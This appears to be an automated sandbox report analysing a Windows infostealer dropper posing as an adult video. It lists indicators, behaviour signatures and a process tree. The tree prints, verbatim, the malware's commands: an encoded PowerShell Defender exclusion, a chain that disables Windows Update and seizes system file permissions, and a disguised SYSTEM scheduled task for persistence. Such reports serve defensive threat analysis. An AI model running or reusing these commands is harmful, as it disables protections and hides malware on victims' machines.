Analysis
-
max time kernel
99s -
max time network
47s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
13-05-2022 17:44
Static task
static1
Behavioral task
behavioral1
Sample
gayporn.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
gayporn.exe
Resource
win10v2004-20220414-en
General
-
Target
gayporn.exe
-
Size
185KB
-
MD5
dc73d106133d7f4652a22a2ba5838bab
-
SHA1
1a24617b06b8c7a694ee6fef57d454ba9dad72fb
-
SHA256
219f75d798f48a66a7643cacca827cd6d9fbf72af8dfaa05b88cb0538a7864f7
-
SHA512
39f6cf4c0d3c27bd690846ee6893e12ef6d6e13e6b975cf65c69f786fda2baa4c17e681b9f5fc5da9a21e7a5a7214f9c4393b344828104234bbf9d1d022b8c4a
Malware Config
Signatures
-
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
369661.exeupdater.exepid process 452 369661.exe 2016 updater.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 1660 takeown.exe 624 icacls.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 11 IoCs
Processes:
gayporn.execmd.exepid process 1928 gayporn.exe 1928 gayporn.exe 1928 gayporn.exe 1928 gayporn.exe 1928 gayporn.exe 1928 gayporn.exe 1928 gayporn.exe 1928 gayporn.exe 1928 gayporn.exe 1928 gayporn.exe 2012 cmd.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 1660 takeown.exe 624 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 9 freegeoip.app 10 freegeoip.app -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
gayporn.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 gayporn.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier gayporn.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Processes:
gayporn.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 gayporn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 gayporn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 gayporn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 gayporn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 gayporn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 gayporn.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.execonhost.exepid process 1212 powershell.exe 1896 conhost.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
gayporn.exepowershell.exepowercfg.execonhost.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 1928 gayporn.exe Token: SeDebugPrivilege 1212 powershell.exe Token: SeShutdownPrivilege 2012 powercfg.exe Token: SeDebugPrivilege 1896 conhost.exe Token: SeShutdownPrivilege 2016 powercfg.exe Token: SeShutdownPrivilege 476 powercfg.exe Token: SeShutdownPrivilege 1068 powercfg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
gayporn.exe369661.execonhost.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1928 wrote to memory of 452 1928 gayporn.exe 369661.exe PID 1928 wrote to memory of 452 1928 gayporn.exe 369661.exe PID 1928 wrote to memory of 452 1928 gayporn.exe 369661.exe PID 1928 wrote to memory of 452 1928 gayporn.exe 369661.exe PID 452 wrote to memory of 1896 452 369661.exe conhost.exe PID 452 wrote to memory of 1896 452 369661.exe conhost.exe PID 452 wrote to memory of 1896 452 369661.exe conhost.exe PID 452 wrote to memory of 1896 452 369661.exe conhost.exe PID 1896 wrote to memory of 428 1896 conhost.exe cmd.exe PID 1896 wrote to memory of 428 1896 conhost.exe cmd.exe PID 1896 wrote to memory of 428 1896 conhost.exe cmd.exe PID 428 wrote to memory of 1212 428 cmd.exe powershell.exe PID 428 wrote to memory of 1212 428 cmd.exe powershell.exe PID 428 wrote to memory of 1212 428 cmd.exe powershell.exe PID 1896 wrote to memory of 1736 1896 conhost.exe cmd.exe PID 1896 wrote to memory of 1736 1896 conhost.exe cmd.exe PID 1896 wrote to memory of 1736 1896 conhost.exe cmd.exe PID 1896 wrote to memory of 2028 1896 conhost.exe cmd.exe PID 1896 wrote to memory of 2028 1896 conhost.exe cmd.exe PID 1896 wrote to memory of 2028 1896 conhost.exe cmd.exe PID 1736 wrote to memory of 548 1736 cmd.exe sc.exe PID 1736 wrote to memory of 548 1736 cmd.exe sc.exe PID 1736 wrote to memory of 548 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1580 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1580 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1580 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1596 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1596 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1596 1736 cmd.exe sc.exe PID 2028 wrote to memory of 2012 2028 cmd.exe powercfg.exe PID 2028 wrote to memory of 2012 2028 cmd.exe powercfg.exe PID 2028 wrote to memory of 2012 2028 cmd.exe powercfg.exe PID 1736 wrote to memory of 1692 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1692 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1692 1736 cmd.exe sc.exe PID 1736 wrote to memory of 752 1736 cmd.exe sc.exe PID 1736 wrote to memory of 752 1736 cmd.exe sc.exe PID 1736 wrote to memory of 752 1736 cmd.exe sc.exe PID 1736 wrote to memory of 2024 1736 cmd.exe sc.exe PID 1736 wrote to memory of 2024 1736 cmd.exe sc.exe PID 1736 wrote to memory of 2024 1736 cmd.exe sc.exe PID 2028 wrote to memory of 2016 2028 cmd.exe powercfg.exe PID 2028 wrote to memory of 2016 2028 cmd.exe powercfg.exe PID 2028 wrote to memory of 2016 2028 cmd.exe powercfg.exe PID 2028 wrote to memory of 476 2028 cmd.exe powercfg.exe PID 2028 wrote to memory of 476 2028 cmd.exe powercfg.exe PID 2028 wrote to memory of 476 2028 cmd.exe powercfg.exe PID 2028 wrote to memory of 1068 2028 cmd.exe powercfg.exe PID 2028 wrote to memory of 1068 2028 cmd.exe powercfg.exe PID 2028 wrote to memory of 1068 2028 cmd.exe powercfg.exe PID 1736 wrote to memory of 1312 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1312 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1312 1736 cmd.exe sc.exe PID 1896 wrote to memory of 776 1896 conhost.exe cmd.exe PID 1896 wrote to memory of 776 1896 conhost.exe cmd.exe PID 1896 wrote to memory of 776 1896 conhost.exe cmd.exe PID 776 wrote to memory of 1512 776 cmd.exe schtasks.exe PID 776 wrote to memory of 1512 776 cmd.exe schtasks.exe PID 776 wrote to memory of 1512 776 cmd.exe schtasks.exe PID 1736 wrote to memory of 1372 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1372 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1372 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1620 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1620 1736 cmd.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\gayporn.exe"C:\Users\Admin\AppData\Local\Temp\gayporn.exe"1⤵
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\369661.exe"C:\Users\Admin\AppData\Local\369661.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\369661.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
-
C:\Windows\system32\sc.exesc stop bits5⤵
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""5⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled5⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""5⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f5⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Chrome\updater.exe5⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\369661.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
